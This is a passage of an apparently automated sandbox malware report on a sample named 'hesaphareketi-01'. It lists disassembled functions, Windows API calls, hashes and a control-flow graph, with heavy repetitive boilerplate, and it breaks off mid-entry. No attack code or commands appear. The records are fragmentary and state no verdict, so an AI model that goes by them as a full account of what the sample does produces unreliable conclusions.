                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave
                                                  • String ID:
                                                  • API String ID: 3168844106-0
                                                  • Opcode ID: 13d948e5fa3df0cfca703f1770c43ab0ec44fa3814605dd8c07f8631823b0f7e
                                                  • Instruction ID: 0d230f44eebb4bba072126c4d1826a3ed1d41bf599041253bf2b6c3df1437775
                                                  • Opcode Fuzzy Hash: 13d948e5fa3df0cfca703f1770c43ab0ec44fa3814605dd8c07f8631823b0f7e
                                                  • Instruction Fuzzy Hash: 53414F62A0C616B2EA28FF03E8C0379E264FF15350FC50039D94DE7A92DE7DE840A321
                                                  Function 00007FF7341ECD40 Relevance: 4.7, APIs: 3, Instructions: 195threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 258 7ff7341ecd40-7ff7341ecd6d 259 7ff7341ecd6f 258->259 260 7ff7341ecd76-7ff7341ecd7e 259->260 261 7ff7341ecd80-7ff7341ecd8a call 7ff734210690 260->261 262 7ff7341ecd8c-7ff7341ecdac 260->262 261->259 264 7ff7341ecea3-7ff7341ecea9 262->264 265 7ff7341ecdb2-7ff7341ecdb8 262->265 269 7ff7341eceb6-7ff7341eceb9 264->269 270 7ff7341eceab-7ff7341eceb1 call 7ff7341f3480 264->270 267 7ff7341ece8d-7ff7341ece98 265->267 268 7ff7341ecdbe 265->268 267->265 271 7ff7341ece9e 267->271 272 7ff7341ecdc0-7ff7341ecdc6 268->272 274 7ff7341ecebf-7ff7341ecec6 269->274 275 7ff7341ecf7a-7ff7341ecf84 call 7ff7342049a0 269->275 270->269 271->264 277 7ff7341ece32-7ff7341ece42 call 7ff7341d9560 272->277 278 7ff7341ecdc8-7ff7341ecdd0 272->278 279 7ff7341ecf71-7ff7341ecf78 274->279 280 7ff7341ececc-7ff7341eced4 274->280 287 7ff7341ecf86-7ff7341ecf8c 275->287 288 7ff7341ecfec-7ff7341ecfef 275->288 298 7ff7341ece66-7ff7341ece6e 277->298 299 7ff7341ece44-7ff7341ece4b 277->299 278->277 284 7ff7341ecdd2-7ff7341ecdd9 278->284 279->275 281 7ff7341ecf22-7ff7341ecf36 call 7ff7341ed9f0 279->281 280->279 285 7ff7341eceda-7ff7341ecf04 280->285 293 7ff7341ecf3b-7ff7341ecf45 281->293 290 7ff7341ecddb-7ff7341ecde8 284->290 291 7ff7341ece29-7ff7341ece30 SwitchToThread 284->291 285->279 292 7ff7341ecf06-7ff7341ecf1d call 7ff73420e0c0 285->292 296 7ff7341ecf9d-7ff7341ecfad call 7ff7342104d0 287->296 297 7ff7341ecf8e-7ff7341ecf91 287->297 288->281 295 7ff7341ecff5-7ff7341ed00d call 7ff7341ed470 288->295 300 7ff7341ecdea 290->300 301 7ff7341ece08-7ff7341ece0c 290->301 294 7ff7341ece83-7ff7341ece87 291->294 292->281 293->260 304 7ff7341ecf4b-7ff7341ecf70 293->304 294->267 294->272 295->293 324 7ff7341ecfaf-7ff7341ecfb9 call 7ff7342049a0 296->324 325 7ff7341ecfbb-7ff7341ecfc1 296->325 297->296 306 7ff7341ecf93-7ff7341ecf98 call 7ff7341f3480 297->306 311 7ff7341ece70-7ff7341ece75 call 7ff734210690 298->311 312 7ff7341ece7a-7ff7341ece7c 298->312 307 7ff7341ece4d-7ff7341ece53 299->307 308 7ff7341ece5c-7ff7341ece61 call 7ff7341e26f0 299->308 310 7ff7341ecdf0-7ff7341ecdf4 300->310 301->294 303 7ff7341ece0e-7ff7341ece16 301->303 303->294 313 7ff7341ece18-7ff7341ece27 call 7ff7341d9560 SwitchToThread 303->313 306->296 307->308 317 7ff7341ece55-7ff7341ece5a SwitchToThread 307->317 308->298 310->301 320 7ff7341ecdf6-7ff7341ecdfe 310->320 311->312 312->294 314 7ff7341ece7e call 7ff7341d94e0 312->314 313->312 314->294 317->298 320->301 326 7ff7341ece00-7ff7341ece06 320->326 324->288 324->325 327 7ff7341ecfc3-7ff7341ecfc6 325->327 328 7ff7341ecfcc-7ff7341ecfe7 call 7ff73420e0c0 325->328 326->301 326->310 327->281 327->328 328->288
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SwitchThread
                                                  • String ID:
                                                  • API String ID: 115865932-0
                                                  • Opcode ID: 0367fbf184d9da815e74a64e67e3c73c88d77959e1b0efac48cd030915a12f3a
                                                  • Instruction ID: 0247cbf28bcf3c0c3cb277d1e697104915b0aad3c2f0d447f8d3bd24e592d9bb
                                                  • Opcode Fuzzy Hash: 0367fbf184d9da815e74a64e67e3c73c88d77959e1b0efac48cd030915a12f3a
                                                  • Instruction Fuzzy Hash: FF718625F08A4367FA2C7F57B8C0675A691AF01744F840139E95DE71D1EF3DF480A664
                                                  Function 00007FF7341E2740 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF7341E5158,?,?,0000000A,00007FF7341E41B0,?,?,00000000,00007FF7341DE8A1), ref: 00007FF7341E2767
                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF7341E5158,?,?,0000000A,00007FF7341E41B0,?,?,00000000,00007FF7341DE8A1), ref: 00007FF7341E2787
                                                  • VirtualAllocExNuma.KERNEL32 ref: 00007FF7341E27A8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual$CurrentNumaProcess
                                                  • String ID:
                                                  • API String ID: 647533253-0
                                                  • Opcode ID: 0ee9833a7794a767601698390b6fdb287f23bc31715070173f580906f203b271
                                                  • Instruction ID: 35d595c7fbe956ae3fa9ab02320a8af92d12a6f17285edfa13219d68e0ae19b1
                                                  • Opcode Fuzzy Hash: 0ee9833a7794a767601698390b6fdb287f23bc31715070173f580906f203b271
                                                  • Instruction Fuzzy Hash: 04F0C271B086E183EB249F06F440229E760AB49FD5F980139EF8C67B68CF3DD5819B14
                                                  Function 00007FF7341D9D50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventRegister
                                                  • String ID: gcConservative
                                                  • API String ID: 3840811365-1953527212
                                                  • Opcode ID: ffe3c2faf81b3ef910fad80c62d0f8518216a282887ed91876dae107d6d140ff
                                                  • Instruction ID: 42a7216b01e88a5b23b91b2d2038e6822da3e74497e7e05dc857c5fe5f6a03f6
                                                  • Opcode Fuzzy Hash: ffe3c2faf81b3ef910fad80c62d0f8518216a282887ed91876dae107d6d140ff
                                                  • Instruction Fuzzy Hash: AC311B63A19A47A1EE08BF56F8C01B9A370FB46B48FC00039C94D9B661DF3CE544E760
                                                  Function 00007FF734238D70 Relevance: 3.0, APIs: 2, Instructions: 21COMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF734238E79,?,?,?,?,00007FF7341DD9D1,?,?,?,00007FF7341DDF4C,00000000,00000020,?), ref: 00007FF734238D8A
                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF734238DA0
                                                    • Part of subcall function 00007FF7342397AC: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7342397B5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
                                                  • String ID:
                                                  • API String ID: 205171174-0
                                                  • Opcode ID: 95691fa6baedfe018d50a01fc6fec94552b967e93a3eb7814b2b8a2ad8293209
                                                  • Instruction ID: d07579c633ae30739752e7054d42287003f8fc781facff7d0a24bae4ab253354
                                                  • Opcode Fuzzy Hash: 95691fa6baedfe018d50a01fc6fec94552b967e93a3eb7814b2b8a2ad8293209
                                                  • Instruction Fuzzy Hash: 11E0EC40E0910B71FD5D3D7318950B491A04F2A774EAC1B30DD3EEC2C2AD1FB451A530
                                                  Function 00007FF7341F64A0 Relevance: 2.6, APIs: 2, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave
                                                  • String ID:
                                                  • API String ID: 3168844106-0
                                                  • Opcode ID: 30e9e35b31ec2547a70cda4d383b3805e38872ae1b4e46b8a6fe90720136f9e7
                                                  • Instruction ID: 02c9cfa6cb882105175325238e68868d80765958115444c29a9181d603deb233
                                                  • Opcode Fuzzy Hash: 30e9e35b31ec2547a70cda4d383b3805e38872ae1b4e46b8a6fe90720136f9e7
                                                  • Instruction Fuzzy Hash: 2141B862A18A42A5DA18AF17A9C0174A394EF15BF4F844338DA7CD76E9CF3CE442D350
                                                  Function 00007FF7341DFC50 Relevance: 2.6, APIs: 2, Instructions: 86memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: d4ca215575fd0c6e0bae6fe572d759c8f06235c4c5b30343d008d1ca5d55f1ae
                                                  • Instruction ID: d53fa511f0f61d0b7c2eb2aedb227e9b2a2980feec2bf06efb73e89247d08d90
                                                  • Opcode Fuzzy Hash: d4ca215575fd0c6e0bae6fe572d759c8f06235c4c5b30343d008d1ca5d55f1ae
                                                  • Instruction Fuzzy Hash: 1431D073B05E1292EA18AF16A49013AA3A0EF4ABD0F848134DF4D97B94DF38E5629350
                                                  Function 00007FF734210440 Relevance: 2.5, APIs: 2, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF7341E27D0: VirtualFree.KERNELBASE ref: 00007FF7341E27DA
                                                  • EnterCriticalSection.KERNEL32(?,?,?,00007FF7341F64F9,?,?,?,00007FF7341FC51D), ref: 00007FF734210472
                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00007FF7341F64F9,?,?,?,00007FF7341FC51D), ref: 00007FF73421049C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeLeaveVirtual
                                                  • String ID:
                                                  • API String ID: 1320683145-0
                                                  • Opcode ID: b5911a8c8c100c65425a835202cd376d10abe74bf2f3be4458c4a8add018ab75
                                                  • Instruction ID: 70c6925fce4735e5e35cdb8251be0d26cd36b53df17833f26c0f6fbfc15ef5f2
                                                  • Opcode Fuzzy Hash: b5911a8c8c100c65425a835202cd376d10abe74bf2f3be4458c4a8add018ab75
                                                  • Instruction Fuzzy Hash: 2FF08617E08652B0EA18AF17F8C4279E3A4BF417A0FC50139E55D97D52CE3CD881E310
                                                  Function 00007FF7341E2700 Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Virtual$AllocFree
                                                  • String ID:
                                                  • API String ID: 2087232378-0
                                                  • Opcode ID: 21fe628a8c245d1f009263de4e24fe02042f17ce3a1401def6f39cd1a18418fe
                                                  • Instruction ID: 7c90269e8292c3b536e7e5d78d98ea3d491c31974f42414322fca9161387df1e
                                                  • Opcode Fuzzy Hash: 21fe628a8c245d1f009263de4e24fe02042f17ce3a1401def6f39cd1a18418fe
                                                  • Instruction Fuzzy Hash: A8E0C234F1651192EF1CAF13BCC266593916F9AB00FD4803CC40D93350DE3DA59AAB20
                                                  Function 00007FF7341E725E Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BreakDebug
                                                  • String ID:
                                                  • API String ID: 456121617-0
                                                  • Opcode ID: bb02521482f357d091ee9155b463287af1990604d8e730fb2d95daa1db2f584a
                                                  • Instruction ID: bd1f2a480c1a8d84bcce50ad0d033a878a0583cd2562d8ae065745df60586a67
                                                  • Opcode Fuzzy Hash: bb02521482f357d091ee9155b463287af1990604d8e730fb2d95daa1db2f584a
                                                  • Instruction Fuzzy Hash: 4341C62BE08A4253FA58AE13E4815B9B391EB457E0F840235DE6DA37C5DF3CE481A214
                                                  Function 00007FF7342742C0 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoInitializeEx.OLE32(?,?,?,?,00000010,?,?,?,?,?,?,?,00007FF73427421E), ref: 00007FF734274312
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: 5e8ccba725479bacf824188a23d3d2666fff54803f6ae21bdc45e87f4798a48e
                                                  • Instruction ID: 3940e745cdec12ac27e3a39c9a1dd6a5f1c0ab81211ca1db6660af4cffae6e47
                                                  • Opcode Fuzzy Hash: 5e8ccba725479bacf824188a23d3d2666fff54803f6ae21bdc45e87f4798a48e
                                                  • Instruction Fuzzy Hash: CE21F823E0C42275FB29BE63A8825FDD6606F41754FE44035ED5CA7A87DE2DA8839260
                                                  Function 00007FF7341D5780 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFailFastQueryRaiseVirtual
                                                  • String ID:
                                                  • API String ID: 3307674043-0
                                                  • Opcode ID: 2c91771eec3dc57a2273c33921620eef897886fe8a235db23191d302b680ff9f
                                                  • Instruction ID: 2db8bed71c21836086418eb5549736442a17e91035ce66726dcf2217fc3461c7
                                                  • Opcode Fuzzy Hash: 2c91771eec3dc57a2273c33921620eef897886fe8a235db23191d302b680ff9f
                                                  • Instruction Fuzzy Hash: 4711947250878192DB18EF26B4411AAB360FB457B4F444335EABD8B7D5DF39D0028700
                                                  Function 00007FF7341E27D0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeVirtual
                                                  • String ID:
                                                  • API String ID: 1263568516-0
                                                  • Opcode ID: f9194b57a0946cc2409ad4d497bf7a480cce94f9d72206b6568b2ab60965888a
                                                  • Instruction ID: 75e1edefb8e820626fd8809e94a750a5a93c5a5b551f5f04f3c5f2121151ef2c
                                                  • Opcode Fuzzy Hash: f9194b57a0946cc2409ad4d497bf7a480cce94f9d72206b6568b2ab60965888a
                                                  • Instruction Fuzzy Hash: BFB01210F16011C2E3083B237CC271802142B49B12FD50028C608F2350CD2C91E52B21

                                                  Non-executed Functions

                                                  Function 00007FF7341E2A60 Relevance: 111.8, Strings: 89, Instructions: 525COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
